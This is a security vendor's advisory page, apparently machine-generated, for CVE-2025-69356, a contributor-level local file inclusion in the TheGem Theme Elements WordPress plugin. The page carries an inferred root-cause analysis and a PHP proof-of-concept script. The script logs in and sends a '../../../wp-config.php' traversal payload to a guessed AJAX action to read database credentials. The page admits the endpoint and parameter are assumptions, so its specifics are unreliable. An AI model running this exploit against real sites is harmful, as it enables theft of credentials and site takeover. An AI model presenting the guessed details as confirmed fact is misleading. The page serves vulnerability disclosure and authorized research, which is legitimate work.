Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-69356: TheGem Theme Elements (for Elementor) <= 5.11.0 – Authenticated (Contributor+) Local File Inclusion (thegem-elements-elementor)

CVE ID CVE-2025-69356
Plugin thegem-elements-elementor
Severity High (CVSS 7.5)
CWE 98
Vulnerable Version 5.11.0
Patched Version
Disclosed January 9, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-69356 (metadata-based):
This vulnerability is an authenticated Local File Inclusion (LFI) in the TheGem Theme Elements for Elementor WordPress plugin, affecting versions up to and including 5.11.0. It allows attackers with contributor-level privileges or higher to include arbitrary files from the server, leading to remote code execution.

Atomic Edge research infers the root cause is improper sanitization of user-supplied input used in a PHP include or require statement (CWE-98). The vulnerability description indicates the flaw allows file inclusion for execution of PHP code. Without a code diff, this conclusion is inferred from the CWE classification and the standard behavior of PHP file inclusion vulnerabilities in WordPress plugins. The plugin likely passes a user-controlled parameter, such as a file path, directly into an include function without validating the path is within an intended directory.

The exploitation method likely involves an authenticated user sending a crafted HTTP request to a plugin-specific AJAX handler or admin endpoint. The attacker would supply a malicious file path parameter, such as a relative path traversal (e.g., ../../../wp-config.php) or a path to an uploaded file containing PHP code. A common WordPress pattern is an AJAX action named after the plugin slug, like wp_ajax_thegem_elements_elementor_action, where a parameter like file or template is vulnerable.

Based on the CWE, the fix in version 5.11.1 likely implements strict validation of the file path parameter. This would involve ensuring the requested file is within an allowed whitelist of directories, using absolute path validation with realpath(), and stripping directory traversal sequences. The patch may also add a capability check stricter than contributor-level, though the description suggests the access level requirement was not part of the initial flaw.

Successful exploitation grants an attacker the ability to read sensitive server files like wp-config.php, which contains database credentials. It also enables remote code execution if the attacker can upload a file with a benign extension (like .png) containing PHP code and then include it via this LFI flaw. This bypasses WordPress file type restrictions and can lead to full site compromise.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC 
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-69356 - TheGem Theme Elements (for Elementor) <= 5.11.0 - Authenticated (Contributor+) Local File Inclusion
<?php
/**
 * This PoC is based on metadata inference. The exact AJAX action and parameter name are assumed.
 * Common patterns for Elementor add-ons suggest an AJAX endpoint with an 'action' parameter.
 * The vulnerable parameter is assumed to be 'file' or 'template'.
 * Requires valid contributor-level WordPress credentials.
 */

$target_url = 'https://example.com/wp-admin/admin-ajax.php'; // CHANGE THIS
$username = 'contributor'; // CHANGE THIS
$password = 'password'; // CHANGE THIS

// Assume the plugin registers an AJAX action like 'thegem_elements_get_template'
$ajax_action = 'thegem_elements_get_template';
// Assume the vulnerable parameter is 'file'
$vuln_param = 'file';
// Payload: Path to wp-config.php using directory traversal
$payload = '../../../wp-config.php';

// Step 1: Authenticate and get WordPress cookies
$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL => str_replace('/admin-ajax.php', '/wp-login.php', $target_url),
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'log' => $username,
        'pwd' => $password,
        'wp-submit' => 'Log In',
        'redirect_to' => $target_url,
        'testcookie' => '1'
    ]),
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_COOKIEJAR => 'cookies.txt',
    CURLOPT_COOKIEFILE => 'cookies.txt',
    CURLOPT_FOLLOWLOCATION => true,
    CURLOPT_SSL_VERIFYPEER => false,
    CURLOPT_SSL_VERIFYHOST => 0
]);
$response = curl_exec($ch);

// Step 2: Exploit the LFI via the assumed AJAX endpoint
curl_setopt_array($ch, [
    CURLOPT_URL => $target_url,
    CURLOPT_POSTFIELDS => http_build_query([
        'action' => $ajax_action,
        $vuln_param => $payload
    ]),
    CURLOPT_RETURNTRANSFER => true
]);
$response = curl_exec($ch);
curl_close($ch);

// Step 3: Check for evidence of successful inclusion
if (strpos($response, 'DB_NAME') !== false || strpos($response, 'define') !== false) {
    echo "[+] Potential LFI success. Check output for sensitive data.n";
    echo substr($response, 0, 2000); // Preview
} else {
    echo "[-] Exploit attempt did not yield expected output. The assumed parameters may be incorrect.n";
    echo "Response length: " . strlen($response) . "n";
}

unlink('cookies.txt');
?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School